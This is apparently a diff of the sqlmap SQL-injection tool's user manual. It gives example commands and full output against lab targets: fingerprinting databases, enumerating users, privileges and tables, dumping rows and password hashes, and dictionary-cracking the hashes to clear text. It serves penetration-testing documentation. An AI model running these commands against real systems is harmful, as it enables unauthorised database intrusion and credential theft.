    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -v 1 -f - -[...] -[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL -[hh:mm:41] [INFO] testing Microsoft SQL Server -[hh:mm:41] [INFO] confirming Microsoft SQL Server -[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS: active fingerprint: Microsoft SQL Server 2000 - html error message fingerprint: Microsoft SQL Server - - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" -v 1 -f - -[...] -[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL -[hh:mm:41] [INFO] testing Microsoft SQL Server -[hh:mm:41] [INFO] confirming Microsoft SQL Server -[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server -web server operating system: Windows 2003 or 2000 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP -back-end DBMS: active fingerprint: Microsoft SQL Server 2005 - html error message fingerprint: Microsoft SQL Server - -

    If you want an even more accurate result, based also on banner parsing, you can also provide the -b or --banner option. -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 2 -f -b - -[...] -[hh:mm:04] [INFO] testing MySQL -[hh:mm:04] [INFO] confirming MySQL -[hh:mm:04] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1 -[hh:mm:04] [INFO] retrieved: 0 -[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:04] [INFO] the back-end DBMS is MySQL -[hh:mm:04] [DEBUG] query: VERSION() -[hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6 -[hh:mm:05] [DEBUG] performed 111 queries in 1 seconds -[hh:mm:05] [DEBUG] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1 -[hh:mm:05] [INFO] retrieved: -[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds -[hh:mm:05] [DEBUG] query: MID(@@table_open_cache, 1, 1) -[hh:mm:05] [INFO] retrieved: -[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds -[hh:mm:05] [DEBUG] query: MID(@@hostname, 1, 1) -[hh:mm:05] [INFO] retrieved: t -[hh:mm:06] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:06] [INFO] executing MySQL comment injection fingerprint -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2 - comment injection fingerprint: MySQL 5.0.67 - banner parsing fingerprint: MySQL 5.0.67 - html error message fingerprint: MySQL -[...] - -

    As you can see, sqlmap was also able to fingerprint the back-end DBMS operating system by parsing the DBMS banner value. -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -v 2 -f -b - -[...] -[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL -[hh:mm:03] [INFO] testing Microsoft SQL Server -[hh:mm:03] [INFO] confirming Microsoft SQL Server -[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server -[hh:mm:03] [DEBUG] performed 13 queries in 0 seconds -[hh:mm:03] [DEBUG] query: @@VERSION -[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86) - Aug 6 2000 00:57:48 - Copyright (c) 1988-2000 Microsoft Corporation - Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) - -[hh:mm:08] [DEBUG] performed 1308 queries in 4 seconds -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS operating system: Windows 2000 Service Pack 4 -back-end DBMS: active fingerprint: Microsoft SQL Server 2000 - banner parsing fingerprint: Microsoft SQL Server 2000 Service Pack 0 - version 8.00.194 - html error message fingerprint: Microsoft SQL Server -[...] - - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b - -[...] -[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL -[hh:mm:03] [INFO] testing Microsoft SQL Server -[hh:mm:03] [INFO] confirming Microsoft SQL Server -[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server -[hh:mm:03] [DEBUG] query: @@VERSION -[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) - Oct 14 2005 00:33:37 - Copyright (c) 1988-2005 Microsoft Corporation - Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) - -[hh:mm:15] [DEBUG] performed 1343 queries in 11 seconds -web server operating system: Windows 2003 or 2000 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP -back-end DBMS operating system: Windows 2003 Service Pack 1 -back-end DBMS: active fingerprint: Microsoft SQL Server 2005 - banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 - version 9.00.1399 - html error message fingerprint: Microsoft SQL Server -[...] - -

    As you can see, from the Microsoft SQL Server banner, sqlmap was able to correctly identify the database management system patch level. @@ -2423,69 +1808,11 @@ Switch: -b or --banner

    Most of the modern database management systems have a function and/or -an environment variable which returns details on the database management -system version. Also, sometimes it returns the operating system version -where the daemon has been compiled on, the operating system architecture, -and its service pack. Usually the function is version() and the -environment variable @@version. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -b -v 0 - -banner: '5.0.67-0ubuntu6' - - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b -v 0 - -banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real -(Ubuntu 4.3.2-1ubuntu11) 4.3.2' - - -

    -Example on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -b -v 0 - -banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product' - - -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -b -v 0 - -banner: ---- -Microsoft SQL Server 2000 - 8.00.194 (Intel X86) - Aug 6 2000 00:57:48 - Copyright (c) 1988-2000 Microsoft Corporation - Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ---- - - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" -v 0 -b - -banner: ---- -Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) - Oct 14 2005 00:33:37 - Copyright (c) 1988-2005 Microsoft Corporation - Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ---- - +an environment variable which returns the database management system +version and eventually details on its patch level, the underlying +system. Usually the function is version() and the environment +variable is @@version, but this vary depending on the target +DBMS. Session user @@ -2494,17 +1821,9 @@ Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Switch: --current-user

    -It is possible to retrieve the database management system's user which is -effectively performing the query on the database from the web application. - -

    -Example on a MySQL 5.0.67 target: - - -python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --current-user -v 0 - -current user: 'testuser@localhost' - +On the majority of modern DBMSes is possible to retrieve the database +management system's user which is effectively performing the query against +the back-end DBMS from the web application. Current database @@ -2513,579 +1832,191 @@ current user: 'testuser@localhost' Switch: --current-db

    -It is possible to retrieve the database management system's database the -web application is connected to. - -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --current-db -v 0 - -current database: 'master' - +It is possible to retrieve the database management system's database name +that the web application is connected to. -Detect if the session user is a database administrator (DBA) +Detect whether or not the session user is a database administrator

    Switch: --is-dba

    -It is possible to detect if the current database management system session user is -a database administrator. - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 2 - -[...] -back-end DBMS: PostgreSQL - -[hh:mm:49] [INFO] testing if current user is DBA -[hh:mm:49] [DEBUG] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE -usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END) -[hh:mm:49] [INFO] retrieved: 1 -[hh:mm:50] [DEBUG] performed 13 queries in 0 seconds -current user is DBA: 'True' - - -

    -Example on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --is-dba -v 2 - -[...] -back-end DBMS: Oracle - -[hh:mm:57] [INFO] testing if current user is DBA -[hh:mm:58] [DEBUG] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE -GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) -THEN 1 ELSE 0 END) FROM DUAL -[hh:mm:58] [INFO] retrieved: 1 -[hh:mm:58] [DEBUG] performed 13 queries in 0 seconds -current user is DBA: 'True' - +It is possible to detect if the current database management system session +user is a database administrator, also known as DBA. +sqlmap will return True if it is, viceversa False. -Users +List database management system users

    Switch: --users

    -It is possible to enumerate the list of database management system users. - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --users -v 0 - -database management system users [3]: -[*] postgres -[*] testuser -[*] testuser2 - +When the session user has read access to the system table containing +information about the DBMS users, it is possible to enumerate the list of +users. -Users password hashes +List and crack database management system users password hashes

    Switches: --passwords and -U

    -It is possible to enumerate the password hashes for each database -management system user. +When the session user has read access to the system table containing +information about the DBMS users' passwords, it is possible to enumerate +the password hashes for each database management system user. +sqlmap will first enumerate the users, then the different password hashes +for each of them.

    -Example on a MySQL 5.0.67 target: +Example against a PostgreSQL target: -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --passwords -v 0 - -[*] debian-sys-maint [1]: - password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892 -[*] root [1]: - password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B -[*] testuser [1]: - password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29 - - -

    -You can also provide the -U option to specify the user who you -want to enumerate the password hashes. - -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --passwords \ - -U sa -v 0 - -database management system users password hashes: -[*] sa [1]: - password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f -ba9930b62ee5d506955 - header: 0x0100 - salt: 0a16d704 - mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955 - - -

    -As you can see, when you enumerate password hashes on Microsoft SQL Server -sqlmap split the hash, useful if you want to crack it. - -

    -If you provide CU as username it will consider it as an alias for -current user and will retrieve the password hashes for this user. - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords \ - -U CU -v 1 +$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1 [...] back-end DBMS: PostgreSQL - -[hh:mm:48] [INFO] fetching current user -[hh:mm:48] [INFO] retrieved: postgres -[hh:mm:49] [INFO] fetching database users password hashes for current user -[hh:mm:49] [INFO] fetching number of password hashes for user 'postgres' -[hh:mm:49] [INFO] retrieved: 1 -[hh:mm:49] [INFO] fetching password hashes for user 'postgres' -[hh:mm:49] [INFO] retrieved: md5d7d880f96044b72d0bba108ace96d1e4 +[hh:mm:38] [INFO] fetching database users password hashes +do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y +[hh:mm:42] [INFO] using hash method: 'postgres_passwd' +what's the dictionary's location? [/tmp/sqlmap/txt/wordlist.txt] +[hh:mm:46] [INFO] loading dictionary from: '/tmp/sqlmap/txt/wordlist.txt' +do you want to use common password suffixes? (slow!) [y/N] n +[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd) +[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser' +[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres' database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96034b72d0bba108afe96c1e7 + password hash: md5d7d880f96044b72d0bba108ace96d1e4 + clear-text password: testpass +[*] testuser [1]: + password hash: md599e5ea7a6f7c3269995cba3927fd0093 + clear-text password: testpass +

    +Not only sqlmap enumerated the DBMS users and their passwords, but it also +recognized the hash format to be PostgreSQL, asked the user whether or not +to test the hashes against a dictionary file and identified the clear-text +password for the postgres user, which is usually a DBA along the +other user, testuser, password. -Users privileges +

    +This feature has been implemented for all DBMS where it is possible to +enumerate users' password hashes, including Oracle and Microsoft SQL +Server pre and post 2005. + +

    +You can also provide the -U option to specify the specific user +who you want to enumerate and eventually crack the password hash(es). +If you provide CU as username it will consider it as an alias for +current user and will retrieve the password hash(es) for this user. + + +List database management system users privileges

    Switches: --privileges and -U

    -It is possible to enumerate the privileges for each database management -system user. - -

    -Example on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --privileges -v 0 - -[hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS' -[hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP' -database management system users privileges: -[*] CTXSYS [2]: - privilege: CTXAPP - privilege: RESOURCE -[*] DBSNMP [1]: - privilege: OEM_MONITOR -[*] FLOWS_020100 (administrator) [4]: - privilege: CONNECT - privilege: DBA - privilege: RESOURCE - privilege: SELECT_CATALOG_ROLE -[*] FLOWS_FILES [2]: - privilege: CONNECT - privilege: RESOURCE -[*] HR (administrator) [3]: - privilege: CONNECT - privilege: DBA - privilege: RESOURCE -[*] MDSYS [2]: - privilege: CONNECT - privilege: RESOURCE -[*] OUTLN [1]: - privilege: RESOURCE -[*] SYS (administrator) [22]: - privilege: AQ_ADMINISTRATOR_ROLE - privilege: AQ_USER_ROLE - privilege: AUTHENTICATEDUSER - privilege: CONNECT - privilege: CTXAPP - privilege: DBA - privilege: DELETE_CATALOG_ROLE - privilege: EXECUTE_CATALOG_ROLE - privilege: EXP_FULL_DATABASE - privilege: GATHER_SYSTEM_STATISTICS - privilege: HS_ADMIN_ROLE - privilege: IMP_FULL_DATABASE - privilege: LOGSTDBY_ADMINISTRATOR - privilege: OEM_ADVISOR - privilege: OEM_MONITOR - privilege: PLUSTRACE - privilege: RECOVERY_CATALOG_OWNER - privilege: RESOURCE - privilege: SCHEDULER_ADMIN - privilege: SELECT_CATALOG_ROLE - privilege: XDBADMIN - privilege: XDBWEBSERVICES -[*] SYSTEM (administrator) [2]: - privilege: AQ_ADMINISTRATOR_ROLE - privilege: DBA -[*] TSMSYS [1]: - privilege: RESOURCE -[*] XDB [2]: - privilege: CTXAPP - privilege: RESOURCE - +When the session user has read access to the system table containing +information about the DBMS users, it is possible to enumerate the +privileges for each database management system user. +By the privileges, sqlmap will also show you which are database +administrators.

    You can also provide the -U option to specify the user who you want to enumerate the privileges.

    -Example on a PostgreSQL 8.3.5 target: +If you provide CU as username it will consider it as an alias for +current user and will enumerate the privileges for this user. - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --privileges \ - -U postgres -v 0 -database management system users privileges: -[*] postgres (administrator) [3]: - privilege: catupd - privilege: createdb - privilege: super - +List database management system users roles

    -As you can see, depending on the user privileges, sqlmap identifies if the -user is a database management system administrator and shows this information -next to the username. +Switches: --roles and -U + +

    +When the session user has read access to the system table containing +information about the DBMS users, it is possible to enumerate the +roles for each database management system user. + +

    +You can also provide the -U option to specify the user who you +want to enumerate the privileges.

    If you provide CU as username it will consider it as an alias for current user and will enumerate the privileges for this user.

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords \ - -U CU -v 1 - -[...] -back-end DBMS: PostgreSQL - -[hh:mm:25] [INFO] fetching current user -[hh:mm:25] [INFO] retrieved: postgres -[hh:mm:25] [INFO] fetching database users privileges for current user -[hh:mm:25] [INFO] fetching number of privileges for user 'postgres' -[hh:mm:25] [INFO] retrieved: 1 -[hh:mm:25] [INFO] fetching privileges for user 'postgres' -[hh:mm:25] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it -into distinct queries to be able to retrieve the output even if we are going blind -[hh:mm:25] [INFO] retrieved: 1 -[hh:mm:25] [INFO] retrieved: 1 -[hh:mm:25] [INFO] retrieved: 1 -database management system users privileges: -[*] postgres (administrator) [3]: - privilege: catupd - privilege: createdb - privilege: super - - -

    -Note that this feature is not available if the back-end database -management system is Microsoft SQL Server. +This feature is only available when the DBMS is Oracle. -Available databases +List database management system's databases

    Switch: --dbs

    -It is possible to enumerate the list of databases. +When the session user has read access to the system table containing +information about available databases, it is possible to enumerate the +list of databases.

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: +Note that this feature is not available if the database management system +is Oracle. - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --dbs -v 0 -available databases [6]: -[*] master -[*] model -[*] msdb -[*] Northwind -[*] pubs -[*] tempdb - - -

    -Note that this feature is not available if the back-end database -management system is Oracle. - -Databases tables +Enumerate database's tables

    Switches: --tables and -D

    -It is possible to enumerate the list of tables for all database -management system's databases. +When the session user has read access to the system table containing +information about databases' tables, it is possible to enumerate +the list of tables for a specific database management system's databases.

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tables -v 0 - -Database: testdb -[1 table] -+---------------------------------------+ -| users | -+---------------------------------------+ - -Database: information_schema -[17 tables] -+---------------------------------------+ -| CHARACTER_SETS | -| COLLATION_CHARACTER_SET_APPLICABILITY | -| COLLATIONS | -| COLUMN_PRIVILEGES | -| COLUMNS | -| KEY_COLUMN_USAGE | -| PROFILING | -| ROUTINES | -| SCHEMA_PRIVILEGES | -| SCHEMATA | -| STATISTICS | -| TABLE_CONSTRAINTS | -| TABLE_PRIVILEGES | -| TABLES | -| TRIGGERS | -| USER_PRIVILEGES | -| VIEWS | -+---------------------------------------+ - -Database: mysql -[17 tables] -+---------------------------------------+ -| columns_priv | -| db | -| func | -| help_category | -| help_keyword | -| help_relation | -| help_topic | -| host | -| proc | -| procs_priv | -| tables_priv | -| time_zone | -| time_zone_leap_second | -| time_zone_name | -| time_zone_transition | -| time_zone_transition_type | -| user | -+---------------------------------------+ - - -

    -You can also provide the -D option to specify the database -that you want to enumerate the tables. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tables \ - -D testdb -v 0 - -Database: testdb -[1 table] -+---------------------------------------+ -| users | -+---------------------------------------+ - - -

    -Example on an Oracle XE 10.2.0.1 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --tables \ - -D users -v 0 - -Database: USERS -[8 tables] -+-------------------+ -| DEPARTMENTS | -| EMPLOYEES | -| HTMLDB_PLAN_TABLE | -| JOB_HISTORY | -| JOBS | -| LOCATIONS | -| REGIONS | -| USERS | -+-------------------+ - +If you do not provide a specific database with switch -D, sqlmap +will enumerate the tables for all DBMS databases.

    Note that on Oracle you have to provide the TABLESPACE_NAME -instead of the database name. In provided example users was -used to retrieve all tables owned by an Oracle database management -system user. +instead of the database name. -Database table columns +Enumerate database table columns

    Switches: --columns, -C, -T and -D

    -It is possible to enumerate the list of columns for a specific database -table. -This functionality depends on the option -T to specify the table name -and optionally on -D to specify the database name. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --columns \ - -T users -D testdb -v 1 - -[...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:20] [INFO] fetching columns for table 'users' on database 'testdb' -[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb' -[hh:mm:20] [INFO] retrieved: 3 -[hh:mm:20] [INFO] retrieved: id -[hh:mm:20] [INFO] retrieved: int(11) -[hh:mm:21] [INFO] retrieved: name -[hh:mm:21] [INFO] retrieved: varchar(500) -[hh:mm:21] [INFO] retrieved: surname -[hh:mm:21] [INFO] retrieved: varchar(1000) -Database: testdb -Table: users -[3 columns] -+---------+---------------+ -| Column | Type | -+---------+---------------+ -| id | int(11) | -| name | varchar(500) | -| surname | varchar(1000) | -+---------+---------------+ - - -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --columns \ - -T users -D master -v 0 - -Database: master -Table: users -[3 columns] -+---------+---------+ -| Column | Type | -+---------+---------+ -| id | int | -| name | varchar | -| surname | varchar | -+---------+---------+ - - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --columns \ - -T users -D public -v 0 - -Database: public -Table: users -[3 columns] -+---------+--------+ -| Column | Type | -+---------+--------+ -| id | int4 | -| name | bpchar | -| surname | bpchar | -+---------+--------+ - - -

    -Note that on PostgreSQL you have to provide public or the -name of a system database. That's because it is not possible to enumerate -other databases tables, only the tables under the schema that the web -application's user is connected to, which is always public. - -

    -If the database name is not specified, the current database name is used. - -

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --columns \ - -T users -v 1 - -[...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:45] [WARNING] missing database parameter, sqlmap is going to use the current -database to enumerate table 'users' columns -[hh:mm:45] [INFO] fetching current database -[hh:mm:45] [INFO] retrieved: testdb -[hh:mm:45] [INFO] fetching columns for table 'users' on database 'testdb' -[hh:mm:45] [INFO] fetching number of columns for table 'users' on database 'testdb' -[hh:mm:45] [INFO] retrieved: 3 -[hh:mm:45] [INFO] retrieved: id -[hh:mm:45] [INFO] retrieved: int(11) -[hh:mm:46] [INFO] retrieved: name -[hh:mm:46] [INFO] retrieved: varchar(500) -[hh:mm:46] [INFO] retrieved: surname -[hh:mm:46] [INFO] retrieved: varchar(1000) -Database: testdb -Table: users -[3 columns] -+---------+---------------+ -| Column | Type | -+---------+---------------+ -| id | int(11) | -| name | varchar(500) | -| surname | varchar(1000) | -+---------+---------------+ - +When the session user has read access to the system table containing +information about database's tables, it is possible to enumerate the list +of columns for a specific database table. +sqlmap also enumerates the data-type for each column.

    +This feature depends on the option -T to specify the table name +and optionally on -D to specify the database name. When the +database name is not specified, the current database name is used. You can also provide the -C option to specify the table columns name like the one you provided to be enumerated.

    -Example on a MySQL 5.0.67 target: +Example against a MySQL target: -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --columns \ - -T users -C name -v 1 - +$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \ + -T users -C name [...] -[hh:mm:20] [WARNING] missing database parameter, sqlmap is going to use the current -database to enumerate table 'users' columns -[hh:mm:20] [INFO] fetching current database -[hh:mm:20] [INFO] retrieved: testdb -[hh:mm:20] [INFO] fetching columns like 'name' for table 'users' on database 'testdb' -[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb' -[hh:mm:20] [INFO] retrieved: 2 -[hh:mm:20] [INFO] retrieved: name -[hh:mm:20] [INFO] retrieved: varchar(500) -[hh:mm:21] [INFO] retrieved: surname -[hh:mm:21] [INFO] retrieved: varchar(1000) Database: testdb Table: users [2 columns] @@ -3097,6 +2028,13 @@ Table: users +---------+---------------+ +

    +Note that on PostgreSQL you have to provide public or the +name of a system database. That's because it is not possible to enumerate +other databases tables, only the tables under the schema that the web +application's user is connected to, which is always aliased by +public. + Dump database table entries @@ -3106,57 +2044,28 @@ Switches: --dump, -C, -T, -D, and --last

    -It is possible to dump table entries. -This functionality depends on the option -T to specify the table -name or on the option -C to specify the column name and, -optionally on -D to specify the database name. +When the session user has read access to a specific database's table it is +possible to dump the table entries.

    -If the table name is specified, but the database name is not, the current +This functionality depends on switch -T to specify the table +name and optionally on switch -D to specify the database name. +If the table name is provided, but the database name is not, the current database name is used.

    -Example on a MySQL 5.0.67 target: +Example against a Firebird target: -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --dump \ - -T users -v 1 - +$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users [...] -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current -database to dump table 'users' entries -[hh:mm:41] [INFO] fetching current database -[hh:mm:41] [INFO] retrieved: testdb -[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb' -[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb' -[hh:mm:41] [INFO] retrieved: 3 -[hh:mm:41] [INFO] retrieved: id -[hh:mm:41] [INFO] retrieved: name -[hh:mm:41] [INFO] retrieved: surname -[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb' -[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb' -[hh:mm:41] [INFO] retrieved: 4 -[hh:mm:41] [INFO] retrieved: 1 -[hh:mm:42] [INFO] retrieved: luther -[hh:mm:42] [INFO] retrieved: blissett -[hh:mm:42] [INFO] retrieved: 2 -[hh:mm:42] [INFO] retrieved: fluffy -[hh:mm:42] [INFO] retrieved: bunny -[hh:mm:42] [INFO] retrieved: 3 -[hh:mm:42] [INFO] retrieved: wu -[hh:mm:42] [INFO] retrieved: ming -[hh:mm:43] [INFO] retrieved: 4 -[hh:mm:43] [INFO] retrieved: -[hh:mm:43] [INFO] retrieved: nameisnull -Database: testdb -Table: users +Database: Firebird_masterdb +Table: USERS [4 entries] +----+--------+------------+ -| id | name | surname | +| ID | NAME | SURNAME | +----+--------+------------+ -| 1 | luther | blissett | +| 1 | luther | blisset | | 2 | fluffy | bunny | | 3 | wu | ming | | 4 | NULL | nameisnull | @@ -3164,181 +2073,40 @@ Table: users

    -You can also provide the -C option to specify the table column -that you want to enumerate the entries. +You can also provide a comma-separated list of the specific columns to +dump with the -C switch.

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --dump \ - -T users -D master -C surname -v 0 - -Database: master -Table: users -[5 entries] -+-------------------+ -| surname | -+-------------------+ -| blisset | -| bunny | -| ming | -| nameisnull | -| user agent header | -+-------------------+ - +sqlmap also generates for each table dumped the entries in a CSV format +textual file. +You can see the absolute path where sqlmap creates the file by providing a +verbosity level greater than or equal to 1.

    -If only the column name is specified, sqlmap will enumerate and ask the -user to dump all databases' tables containing user provided column(s). -This feature can be useful to identify, for instance, tables containing -custom application credentials. +If you want to dump only a range of entries, then you can provide switches +--start and/or --stop to respectively +start to dump from a certain entry and stop the dump at a certain entry. +For instance, if you want to dump only the first entry, provide +--stop 1 in your command line. Vice versa if, for +instance, you want to dump only the second and third entry, provide +--start 1 --stop 3.

    -Example on a MySQL 5.0.67 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \ - -C "urna" - -[...] -back-end DBMS: MySQL >= 5.0.0 - -do you want sqlmap to consider provided column(s): -[1] as LIKE column names (default) -[2] as exact column names -> 1 -[hh:mm:08] [INFO] fetching databases with tables containing columns like 'urna' -[hh:mm:08] [INFO] fetching number of databases with tables containing columns like -'urna' -[hh:mm:08] [INFO] retrieved: 1 -[hh:mm:08] [INFO] retrieved: testdb -[hh:mm:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb' -[hh:mm:10] [INFO] fetching number of tables containing columns like 'urna' in -database 'testdb' -[hh:mm:10] [INFO] retrieved: 1 -[hh:mm:10] [INFO] retrieved: users -[hh:mm:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb' -[hh:mm:10] [INFO] fetching number of columns for table 'users' on database 'testdb' -[hh:mm:10] [INFO] retrieved: 1 -[hh:mm:10] [INFO] retrieved: surname -Columns like 'urna' were found in the following databases: -Database: testdb -Table: users -[1 column] -+---------+ -| Column | -+---------+ -| surname | -+---------+ - -do you want to dump entries? [Y/n] y -which database(s)? -[a]ll (default) -[testdb] -[q]uit -> -which table(s) of database 'testdb'? -[a]ll (default) -[users] -[s]kip -[q]uit -> -[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on -database 'testdb' -[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table -'users' on database 'testdb' -[hh:mm:23] [INFO] retrieved: 4 -[hh:mm:23] [INFO] retrieved: blissett -[hh:mm:23] [INFO] retrieved: bunny -[hh:mm:23] [INFO] retrieved: ming -[hh:mm:23] 